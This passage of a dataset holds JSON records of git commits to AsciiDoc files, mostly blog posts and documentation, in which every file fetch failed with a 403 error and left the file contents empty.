'https:\/\/github.com\/qarea\/jirams.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"158ee23527c5aa5e3e9d762e8271fb578650524c","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"899de8f64012ac8929408409d9dbb38ca9ff1f19","subject":"refactor(Ch1): \u30b5\u30f3\u30d7\u30eb\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u306f\u6210\u529f\u306b\u3059\u308b","message":"refactor(Ch1): \u30b5\u30f3\u30d7\u30eb\u306e\u30c7\u30d5\u30a9\u30eb\u30c8\u306f\u6210\u529f\u306b\u3059\u308b\n\n\u30c7\u30d5\u30a9\u30eb\u30c8\u304c\u5931\u6557\u3060\u3068\u30b5\u30f3\u30d7\u30eb\u304c\u304a\u304b\u3057\u3044\u306e\u304b\u3068\u8aa4\u89e3\u3059\u308b\n","repos":"xifeiwu\/promises-book,genie88\/promises-book,cqricky\/promises-book,purepennons\/promises-book,mzbac\/promises-book,mzbac\/promises-book,sunfurong\/promise,liyunsheng\/promises-book,azu\/promises-book,azu\/promises-book,charlenopires\/promises-book,wenber\/promises-book,purepennons\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,genie88\/promises-book,cqricky\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,dieface\/promises-book,lidasong2014\/promises-book,purepennons\/promises-book,azu\/promises-book,liubin\/promises-book,genie88\/promises-book,tangjinzhou\/promises-book,lidasong2014\/promises-book,dieface\/promises-book,xifeiwu\/promises-book,liubin\/promises-book,sunfurong\/promise,liubin\/promises-book,oToUC\/promises-book,oToUC\/promises-book,azu\/promises-book,wangwei1237\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,wangwei1237\/promises-book,wenber\/promises-book,liyunsheng\/promises-book,charlenopires\/promises-book,cqricky\/promises-book,xifeiwu\/promises-book,sunfurong\/promise,wenber\/promises-book,dieface\/promises-book,mzbac\/promises-book,oToUC\/promises-book","old_file":"Ch1_WhatsPromises\/writing-promises.adoc","new_file":"Ch1_WhatsPromises\/writing-promises.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mzbac\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1e031588cd65e688beb82ecf6579ec7365817e6","subject":"No double log","message":"No double log\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/Exceptions.adoc","new_file":"Best practices\/Exceptions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16f6db1df4627deabe1b20f6a4185ab532ca41f0","subject":"Update 2017-06-11-vimmer1.adoc","message":"Update 2017-06-11-vimmer1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-11-vimmer1.adoc","new_file":"_posts\/2017-06-11-vimmer1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b13746af694d172ef9a56ec60b645774c4f27e0","subject":"Update 2017-08-14-Azure-6.adoc","message":"Update 2017-08-14-Azure-6.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-14-Azure-6.adoc","new_file":"_posts\/2017-08-14-Azure-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87d7f0db27eb68e770db88c1e4fcf79b8c4cd672","subject":"Update 2016-10-19-Java-SH-A.adoc","message":"Update 2016-10-19-Java-SH-A.adoc","repos":"SnorlaxH\/blog.urusa.me,SnorlaxH\/blog.urusa.me,SnorlaxH\/blog.urusa.me,SnorlaxH\/blog.urusa.me","old_file":"_posts\/2016-10-19-Java-SH-A.adoc","new_file":"_posts\/2016-10-19-Java-SH-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SnorlaxH\/blog.urusa.me.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c1b6c2be625c0d44335d6c799a5b987462ff10be","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1da9a2370d23f5bc0fbb6423a141af40199b2162","subject":"Update 2015-09-03-One.adoc","message":"Update 2015-09-03-One.adoc","repos":"manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io,manueljordan\/manueljordan.github.io","old_file":"_posts\/2015-09-03-One.adoc","new_file":"_posts\/2015-09-03-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manueljordan\/manueljordan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21cad626a61ffa840002ba63466d3e0abcfe6c1c","subject":"Update 2017-01-21-Dev-Ops-Server-SSH.adoc","message":"Update 2017-01-21-Dev-Ops-Server-SSH.adoc","repos":"iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io,iamthinkking\/iamthinkking.github.io","old_file":"_posts\/2017-01-21-Dev-Ops-Server-SSH.adoc","new_file":"_posts\/2017-01-21-Dev-Ops-Server-SSH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iamthinkking\/iamthinkking.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0fb1ad0297d99d8a8b5960887e8eb46f28218c0","subject":"Update 2017-05-01-UIUCTF-2017-Crypto.adoc","message":"Update 2017-05-01-UIUCTF-2017-Crypto.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_file":"_posts\/2017-05-01-UIUCTF-2017-Crypto.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ffcf2ae5839015360d4efe3413bd57b8fd7f6967","subject":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","message":"Update 2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_file":"_posts\/2015-09-23-When-it-hits-it-hurts-doesnt-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46fb04d531167af40db447da8d721cefd0fe5569","subject":"Update 2016-19-05-Scala-training-camp-at-Lunatech.adoc","message":"Update 2016-19-05-Scala-training-camp-at-Lunatech.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-19-05-Scala-training-camp-at-Lunatech.adoc","new_file":"_posts\/2016-19-05-Scala-training-camp-at-Lunatech.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8e1ef8fea2e20605ec8a5881b03f526edd1a4c","subject":"my MeteorJS talk links to slides and demo","message":"my MeteorJS talk links to slides and demo\n","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2015-11-20-MeteorJS-intro-meetup-14-nantesjs.adoc","new_file":"_posts\/2015-11-20-MeteorJS-intro-meetup-14-nantesjs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66cf497a3fa8dd8db65436ef6c5e37bbe525ca8a","subject":"y2b create post How to charge your iPhone without wires!","message":"y2b create post How to charge your iPhone without wires!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-07-08-How-to-charge-your-iPhone-without-wires.adoc","new_file":"_posts\/2016-07-08-How-to-charge-your-iPhone-without-wires.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388a0565e34418d9bbe5bef5b37538e1f7ef7656","subject":"Update 2015-04-28-Test-Post.adoc","message":"Update 2015-04-28-Test-Post.adoc","repos":"therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks,therebelrobot\/blog-n.ode.rocks","old_file":"_posts\/2015-04-28-Test-Post.adoc","new_file":"_posts\/2015-04-28-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/therebelrobot\/blog-n.ode.rocks.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f4b21b0c6a015ff5cb1b319ea6f6bf5433efa56","subject":"Update 2016-02-04-Inception.adoc","message":"Update 2016-02-04-Inception.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-04-Inception.adoc","new_file":"_posts\/2016-02-04-Inception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0f713d2704a8433ad6005bc776108ac20904e6a","subject":"Update 2017-03-25-create-pc.adoc","message":"Update 2017-03-25-create-pc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-25-create-pc.adoc","new_file":"_posts\/2017-03-25-create-pc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"482b3edc3a33ce3bb06e1cd3925a4ebc72b22a0f","subject":"Update 2017-07-16-July-2017.adoc","message":"Update 2017-07-16-July-2017.adoc","repos":"TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io,TsungmingLiu\/tsungmingliu.github.io","old_file":"_posts\/2017-07-16-July-2017.adoc","new_file":"_posts\/2017-07-16-July-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TsungmingLiu\/tsungmingliu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63542df8e0e474436fcc92203c00ecbba788f7d2","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a70862246cfa3d26bdd11dfa68bb5a9e711b4db","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d151224fa5f9367429a37a09455d7bc013113883","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4469fe140eec7040127b412df8106f4ea12077c","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"96516b5df7d6fa3609445c1b4c94f958690935ba","subject":"Update 2016-06-02-first-blog.adoc","message":"Update 2016-06-02-first-blog.adoc","repos":"chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io","old_file":"_posts\/2016-06-02-first-blog.adoc","new_file":"_posts\/2016-06-02-first-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chdask\/chdask.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c18a730587378a0b47b31dac00063623e8d9a43","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d088af7a66a1a52e08bacf3fb2f2a12001da3509","subject":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","message":"Update 2016-04-01-S-Q-L-Injection-basic.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_file":"_posts\/2016-04-01-S-Q-L-Injection-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5fd0daa3b8f4418a3456c77b8895d9530c81682a","subject":"Update 2015-08-29-Ruby.adoc","message":"Update 2015-08-29-Ruby.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-08-29-Ruby.adoc","new_file":"_posts\/2015-08-29-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c9c875bd9b7fc6295a85bfa0972a14bcbb7394e3","subject":"Create CONTRIBUTING.adoc","message":"Create CONTRIBUTING.adoc","repos":"synyx\/urlaubsverwaltung,synyx\/urlaubsverwaltung,synyx\/urlaubsverwaltung,synyx\/urlaubsverwaltung","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/synyx\/urlaubsverwaltung.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2d5edbc647cb3569ff520be1e588d20b717957e2","subject":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","message":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d26dbdbc61b89a8a7b6c006ab39aa39a7befdc2b","subject":"Update 2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","message":"Update 2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","new_file":"_posts\/2015-10-07-Episode-24-Small-Wheel-No-Jackpots-Lit.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28547a852d707e0282e0229d0667d597bfba98a5","subject":"Update 2016-10-28-innovation-Engineer-Blog-Authors.adoc","message":"Update 2016-10-28-innovation-Engineer-Blog-Authors.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-28-innovation-Engineer-Blog-Authors.adoc","new_file":"_posts\/2016-10-28-innovation-Engineer-Blog-Authors.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e5395f6f1ebbe439c9df0d93769a7911bfc8888","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c33832de9b712fbe4fafd6ec6018800fcee3cc5","subject":"y2b create post Dead Island Unboxing (Special Edition) PS3","message":"y2b create post Dead Island Unboxing (Special Edition) PS3","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-09-07-Dead-Island-Unboxing-Special-Edition-PS3.adoc","new_file":"_posts\/2011-09-07-Dead-Island-Unboxing-Special-Edition-PS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22688bfe2a02742524a3f2b31531818d8681064d","subject":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","message":"Update 2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_file":"_posts\/2017-08-05-Criando-um-carrinho-de-compras-com-Vuejs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9385b49067d8bd938515ec479a699f653b1c1ebc","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e0b13307783109c5d166eec726328ce60bf716e","subject":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","message":"Update 2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_file":"_posts\/2017-07-09-Renewing-CERTBOT-certificates-painlessly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d546a2483182e948db1245ad003034e3fac9713c","subject":"Update 2017-6-1-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","message":"Update 2017-6-1-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-6-1-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","new_file":"_posts\/2017-6-1-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"035a5e749768618080ca57ade3fe5b0fad14f290","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e6d1a0671a39b743312f5e413ca9e13f7aaf638","subject":"Added Remove Properties EIP docs","message":"Added Remove Properties EIP docs\n","repos":"dmvolod\/camel,mcollovati\/camel,christophd\/camel,alvinkwekel\/camel,onders86\/camel,ullgren\/camel,alvinkwekel\/camel,CodeSmell\/camel,akhettar\/camel,CodeSmell\/camel,mcollovati\/camel,ullgren\/camel,christophd\/camel,kevinearls\/camel,onders86\/camel,tadayosi\/camel,tadayosi\/camel,davidkarlsen\/camel,tdiesler\/camel,anoordover\/camel,tdiesler\/camel,kevinearls\/camel,nicolaferraro\/camel,snurmine\/camel,Fabryprog\/camel,apache\/camel,Fabryprog\/camel,jonmcewen\/camel,apache\/camel,sverkera\/camel,tdiesler\/camel,zregvart\/camel,gnodet\/camel,cunningt\/camel,akhettar\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,curso007\/camel,nikhilvibhav\/camel,jonmcewen\/camel,curso007\/camel,gnodet\/camel,gnodet\/camel,akhettar\/camel,zregvart\/camel,zregvart\/camel,pmoerenhout\/camel,pax95\/camel,apache\/camel,tadayosi\/camel,CodeSmell\/camel,snurmine\/camel,pax95\/camel,zregvart\/camel,nikhilvibhav\/camel,punkhorn\/camel-upstream,onders86\/camel,pax95\/camel,tadayosi\/camel,adessaigne\/camel,anoordover\/camel,adessaigne\/camel,dmvolod\/camel,dmvolod\/camel,cunningt\/camel,akhettar\/camel,cunningt\/camel,tdiesler\/camel,dmvolod\/camel,pax95\/camel,gnodet\/camel,apache\/camel,DariusX\/camel,Fabryprog\/camel,pmoerenhout\/camel,sverkera\/camel,onders86\/camel,ullgren\/camel,jonmcewen\/camel,sverkera\/camel,ullgren\/camel,cunningt\/camel,Fabryprog\/camel,jamesnetherton\/camel,christophd\/camel,jamesnetherton\/camel,gautric\/camel,kevinearls\/camel,adessaigne\/camel,dmvolod\/camel,punkhorn\/camel-upstream,objectiser\/camel,pmoerenhout\/camel,curso007\/camel,jamesnetherton\/camel,jonmcewen\/camel,davidkarlsen\/camel,gnodet\/camel,pmoerenhout\/camel,adessaigne\/camel,snurmine\/camel,adessaigne\/camel,dmvolod\/camel,nikhilvibhav\/camel,anoordover\/camel,davidkarlsen\/camel,jamesnetherton\/camel,jonmcewen\/camel,punkhorn\/camel-upstream,gautric\/camel,onders86\/camel,cunningt\/camel,nicolaferraro\/camel,alvinkwekel\/camel,tadayosi\/camel,tadayosi\/camel,DariusX\/camel,nicolaferraro\/camel,sverkera\/camel,pmoerenhout\/camel,davidkarlsen\/camel,adessaigne\/camel,anoordover\/camel,apache\/camel,snurmine\/camel,tdiesler\/camel,DariusX\/camel,pax95\/camel,snurmine\/camel,cunningt\/camel,pax95\/camel,onders86\/camel,curso007\/camel,christophd\/camel,jamesnetherton\/camel,tdiesler\/camel,anoordover\/camel,mcollovati\/camel,gautric\/camel,jamesnetherton\/camel,kevinearls\/camel,kevinearls\/camel,pmoerenhout\/camel,objectiser\/camel,gautric\/camel,apache\/camel,objectiser\/camel,akhettar\/camel,kevinearls\/camel,DariusX\/camel,gautric\/camel,snurmine\/camel,CodeSmell\/camel,sverkera\/camel,nikhilvibhav\/camel,sverkera\/camel,mcollovati\/camel,curso007\/camel,jonmcewen\/camel,curso007\/camel,christophd\/camel,objectiser\/camel,alvinkwekel\/camel,anoordover\/camel,christophd\/camel,gautric\/camel,akhettar\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/removeProperties-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/removeProperties-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e7effb848ba72f1e0017c96b71fd1c487133ae3","subject":"Update promise-overview.adoc","message":"Update 